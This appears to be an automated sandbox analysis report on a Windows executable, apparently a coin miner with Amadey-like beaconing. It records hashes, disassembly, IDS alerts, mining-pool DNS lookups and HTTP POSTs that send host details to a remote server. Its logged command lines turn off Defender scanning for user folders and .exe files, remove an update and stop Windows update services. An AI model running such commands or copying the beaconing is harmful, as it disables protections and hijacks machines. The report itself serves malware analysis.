                                                                    Entropy (8bit):6.2660301556221185
                                                                    Encrypted:false
                                                                    SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                    MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                    SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                    SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                    SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                    Joe Sandbox View:
• Filename: file.exe, Detection: malicious
• Filename: ICBM.exe, Detection: malicious
• Filename: ICBM.exe, Detection: malicious
• Filename: ahlntQUj2t.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: ICBM.exe, Detection: malicious
• Filename: ICBM.exe, Detection: malicious
• Filename: ICBM.exe, Detection: malicious
• Filename: ICBM.exe, Detection: malicious
• Filename: HmA7s2gaa5.exe, Detection: malicious
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Entropy (8bit):6.550874483171553
                                                                    TrID:
                                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:file.exe
                                                                    File size:5'511'680 bytes
                                                                    MD5:73a56908097ee57dd4217877aeae4641
                                                                    SHA1:a41cc3570f40f9688b2ac9f5e7326150a3a350a6
                                                                    SHA256:fde56e00761a85ad495bd2d05654f3657922f665f58edfabcf43d2fa769f0d79
                                                                    SHA512:930ba7d57f250b5c9e020c0265db9376d0675bfcafb7c5c5e292add319ec2942a9f2b5286f997e406e7f1effb8e1029649a5141cd7ad032f4b75a77e51259c67
                                                                    SSDEEP:98304:Ri+ISLkAwC4YIVupdG/3tSKqetQBNzeSBPMjSZQVG2aHlyu+NsehhNreacvHGK4B:RkkIVuI3tSytQrzpMWZ66wNreacPGKK
                                                                    TLSH:CA4612651BC103AEF2E040794F3505F3501A66A18D1B0BABD2F56E57EBB2DE7C021CEA
                                                                    File Content Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d.....)g.........."......"....R.....@..........@..............................T...........`........................................
                                                                    Icon Hash:00928e8e8686b000
                                                                    Entrypoint:0x140001140
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x140000000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x6729CCCF [Tue Nov 5 07:44:15 2024 UTC]
                                                                    TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:6
                                                                    OS Version Minor:0
                                                                    File Version Major:6
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:6
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:b237ac2118704db9e7609540658f5790
Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [00012ED5h]
mov dword ptr [eax], 00000001h
call 00007F2B208476FFh
nop
nop
nop
dec eax
add esp, 28h
ret
nop
inc ecx
push edi
inc ecx
push esi
push esi
push edi
push ebx
dec eax
sub esp, 20h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov edi, dword ptr [eax+08h]
dec eax
mov esi, dword ptr [00012EC9h]
xor eax, eax
dec eax
cmpxchg dword ptr [esi], edi
sete bl
je 00007F2B20847720h
dec eax
cmp edi, eax
je 00007F2B2084771Bh
dec esp
mov esi, dword ptr [00016779h]
nop word ptr [eax+eax+00000000h]
mov ecx, 000003E8h
inc ecx
call esi
xor eax, eax
dec eax
cmpxchg dword ptr [esi], edi
sete bl
je 00007F2B208476F7h
dec eax
cmp edi, eax
jne 00007F2B208476D9h
dec eax
mov edi, dword ptr [00012E90h]
mov eax, dword ptr [edi]
cmp eax, 01h
jne 00007F2B208476FEh
mov ecx, 0000001Fh
call 00007F2B20859474h
jmp 00007F2B20847719h
cmp dword ptr [edi], 00000000h
je 00007F2B208476FBh
mov byte ptr [005417D1h], 00000001h
jmp 00007F2B2084770Bh
mov dword ptr [edi], 00000001h
dec eax
mov ecx, dword ptr [00012E7Ah]
dec eax
mov edx, dword ptr [00012E7Bh]
call 00007F2B2085946Bh
mov eax, dword ptr [edi]
cmp eax, 01h
jne 00007F2B2084770Bh
dec eax
mov ecx, dword ptr [00012E50h]
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x17608          0x3c          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x549000         0x390         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x546000         0x198         .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x54a000         0x78          .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x140a0          0x28          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x14410          0x138         .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x177c0          0x178         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
.text   0x1000           0x12116       0x12200   1509289b251ce927850ce27f89ece8ba  False     0.45307112068965516  data       6.186061855046194    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x14000          0x3dfc        0x3e00    67b011c23b7e5c8a4355c1eee092ccb3  False     0.5104586693548387   data       5.136352755110268    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x18000          0x52d768      0x52aa00  c229dead7ce3676099ffc9aaa6beeb38  unknown   unknown              unknown    unknown              IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata  0x546000         0x198         0x200     a284cbcfa1d13c11a0dffabcca064100  False     0.52734375           data       3.6332552680991546   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.00cfg  0x547000         0x10          0x200     b18c7380298e104adf73576fa46bccc1  False     0.04296875           data       0.15127132530476972  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls    0x548000         0x10          0x200     bf619eac0cdf3f68d496ea9344137e8b  False     0.02734375           data       0.0                  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x549000         0x390         0x400     0dd02af6ec781894019ac3fdb5cbf63f  False     0.384765625          data       2.998554535660332    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x54a000         0x78          0x200     a39919fdf7b33c1123ed7bed1fd77dde  False     0.23828125           data       1.4899261113070796   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name        RVA       Size   Type  Language  Country        ZLIB Complexity
RT_VERSION  0x549060  0x32c  data  English   United States  0.4396551724137931
DLL           Import
msvcrt.dll    __C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strcat, strcpy, strlen, strncmp, strstr, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
KERNEL32.dll  DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
Language of compilation system  Country where language is spoken
English                         United States
Timestamp                         SID      Signature                                                           Severity  Source IP       Source Port  Dest IP          Dest Port  Protocol
2024-11-05T12:24:36.141321+0100   2044697  ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3            1         192.168.2.9     49768        162.230.48.189   80         TCP
2024-11-05T12:24:41.243644+0100   2022930  ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow  1     20.12.23.50     443          192.168.2.9      49794      TCP
2024-11-05T12:25:18.678723+0100   2022930  ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow  1     20.12.23.50     443          192.168.2.9      49976      TCP
2024-11-05T12:25:35.977063+0100   2044697  ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3            1         192.168.2.9     49984        162.230.48.189   80         TCP
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                    Nov 5, 2024 12:25:52.826481104 CET2012849985149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:52.830904007 CET4998520128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:52.836220980 CET2012849985149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:52.836271048 CET4998520128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:26:10.536220074 CET4998620128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:26:10.541222095 CET2012849986149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:26:10.541315079 CET4998620128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:26:30.088690042 CET4998620128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:26:30.122559071 CET2012849986149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:26:30.368482113 CET2012849986149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:26:30.368712902 CET2012849986149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:26:30.368891001 CET4998620128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:26:30.369327068 CET4998620128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:26:30.374243975 CET2012849986149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:26:30.629476070 CET2012849986149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:26:30.630374908 CET4998620128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:26:30.635612011 CET2012849986149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:26:30.635667086 CET4998620128192.168.2.9149.102.143.109
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 5, 2024 12:24:34.048630953 CET | 63022 | 53 | 192.168.2.9 | 1.1.1.1
Nov 5, 2024 12:24:34.058034897 CET | 53 | 63022 | 1.1.1.1 | 192.168.2.9

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 5, 2024 12:24:34.048630953 CET | 192.168.2.9 | 1.1.1.1 | 0x14ba | Standard query (0) | gulf.moneroocean.stream | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 5, 2024 12:24:21.823111057 CET | 1.1.1.1 | 192.168.2.9 | 0x3e94 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | azurefd-t-fb-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 5, 2024 12:24:21.823111057 CET | 1.1.1.1 | 192.168.2.9 | 0x3e94 | No error (0) | dual.s-part-0017.t-0009.fb-t-msedge.net | s-part-0017.t-0009.fb-t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 5, 2024 12:24:21.823111057 CET | 1.1.1.1 | 192.168.2.9 | 0x3e94 | No error (0) | s-part-0017.t-0009.fb-t-msedge.net | | 13.107.253.45 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 12:24:34.058034897 CET | 1.1.1.1 | 192.168.2.9 | 0x14ba | No error (0) | gulf.moneroocean.stream | monerooceans.stream | | CNAME (Canonical name) | IN (0x0001) | false
Nov 5, 2024 12:24:34.058034897 CET | 1.1.1.1 | 192.168.2.9 | 0x14ba | No error (0) | monerooceans.stream | | 149.102.143.109 | A (IP address) | IN (0x0001) | false
• 162.230.48.189

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49768 | 162.230.48.189 | 80 | 5568 | C:\Windows\System32\dialer.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 12:24:35.054439068 CET | 174 | OUT | POST /api/endpoint.php HTTP/1.1
    Accept: */*
    Connection: close
    Content-Length: 283
    Content-Type: application/json
    Host: 162.230.48.189
    User-Agent: cpp-httplib/0.12.6
Nov 5, 2024 12:24:35.059917927 CET | 283 | OUT | Data Raw: 7b 22 69 64 22 3a 22 69 68 6d 79 70 69 73 65 74 78 64 72 71 65 7a 65 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 33 37 36 34 38 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 4f 35 38 43 45 59
    Data Ascii: {"id":"ihmypisetxdrqeze","computername":"376483","username":"SYSTEM","gpu":"O58CEYKSL","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System
Nov 5, 2024 12:24:36.140078068 CET | 267 | IN | HTTP/1.1 200 OK
    Date: Tue, 05 Nov 2024 11:24:32 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
    X-Robots-Tag: noindex, nofollow
    X-Powered-By: PHP/8.0.30
    Content-Length: 17
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 7b 22 72 65 73 70 6f 6e 73 65 22 3a 22 6f 6b 22 7d
    Data Ascii: {"response":"ok"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49984 | 162.230.48.189 | 80 | 5568 | C:\Windows\System32\dialer.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 12:25:34.991242886 CET | 174 | OUT | POST /api/endpoint.php HTTP/1.1
    Accept: */*
    Connection: close
    Content-Length: 284
    Content-Type: application/json
    Host: 162.230.48.189
    User-Agent: cpp-httplib/0.12.6
Nov 5, 2024 12:25:34.996090889 CET | 284 | OUT | Data Raw: 7b 22 69 64 22 3a 22 69 68 6d 79 70 69 73 65 74 78 64 72 71 65 7a 65 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 33 37 36 34 38 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 4f 35 38 43 45 59
    Data Ascii: {"id":"ihmypisetxdrqeze","computername":"376483","username":"SYSTEM","gpu":"O58CEYKSL","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System
Nov 5, 2024 12:25:35.976833105 CET | 251 | IN | HTTP/1.1 200 OK
    Date: Tue, 05 Nov 2024 11:25:32 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
    X-Robots-Tag: noindex, nofollow
    X-Powered-By: PHP/8.0.30
    Content-Length: 2
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 7b 7d
    Data Ascii: {}


Code Manipulations

Function Name | Hook Type | Active in Processes
ZwEnumerateKey | INLINE | explorer.exe, winlogon.exe
NtQuerySystemInformation | INLINE | explorer.exe, winlogon.exe
ZwResumeThread | INLINE | explorer.exe, winlogon.exe
NtDeviceIoControlFile | INLINE | explorer.exe, winlogon.exe
ZwDeviceIoControlFile | INLINE | explorer.exe, winlogon.exe
NtEnumerateKey | INLINE | explorer.exe, winlogon.exe
NtQueryDirectoryFile | INLINE | explorer.exe, winlogon.exe
ZwEnumerateValueKey | INLINE | explorer.exe, winlogon.exe
ZwQuerySystemInformation | INLINE | explorer.exe, winlogon.exe
NtResumeThread | INLINE | explorer.exe, winlogon.exe
RtlGetNativeSystemInformation | INLINE | explorer.exe, winlogon.exe
NtQueryDirectoryFileEx | INLINE | explorer.exe, winlogon.exe
NtEnumerateValueKey | INLINE | explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx | INLINE | explorer.exe, winlogon.exe
ZwQueryDirectoryFile | INLINE | explorer.exe, winlogon.exe

Function Name | Hook Type | New Data
ZwEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF


Target ID: 0
Start time: 06:24:23
Start date: 05/11/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0x7ff6f1d40000
File size: 5'511'680 bytes
MD5 hash: 73A56908097EE57DD4217877AEAE4641
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 06:24:24
Start date: 05/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase: 0x7ff760310000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 06:24:24
Start date: 05/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 06:24:27
Start date: 05/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase: 0x7ff652a00000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 06:24:27
Start date: 05/11/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sc.exe stop UsoSvc
Imagebase: 0x7ff7c61a0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 06:24:27
Start date: 05/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 06:24:27
Start date: 05/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 06:24:27
Start date: 05/11/2024
Path: C:\Windows\System32\wusa.exe
Wow64 process (32bit): false
Commandline: wusa /uninstall /kb:890830 /quiet /norestart
Imagebase: 0x7ff7e7830000
File size: 345'088 bytes
MD5 hash: FBDA2B8987895780375FE0E6254F6198
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 10
Start time: 06:24:28
Start date: 05/11/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sc.exe stop WaaSMedicSvc
Imagebase: 0x7ff7c61a0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 06:24:28
Start date: 05/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 06:24:28
Start date: 05/11/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sc.exe stop wuauserv
Imagebase: 0x7ff7c61a0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 06:24:28
Start date: 05/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:14
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\sc.exe stop bits
                                                                    Imagebase:0x7ff7c61a0000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:15
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:16
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                    Imagebase:0x7ff7c61a0000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:17
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:18
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                    Imagebase:0x7ff67c300000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:19
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                    Imagebase:0x7ff67c300000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:20
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:21
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                    Imagebase:0x7ff67c300000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:22
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:23
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                    Imagebase:0x7ff67c300000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
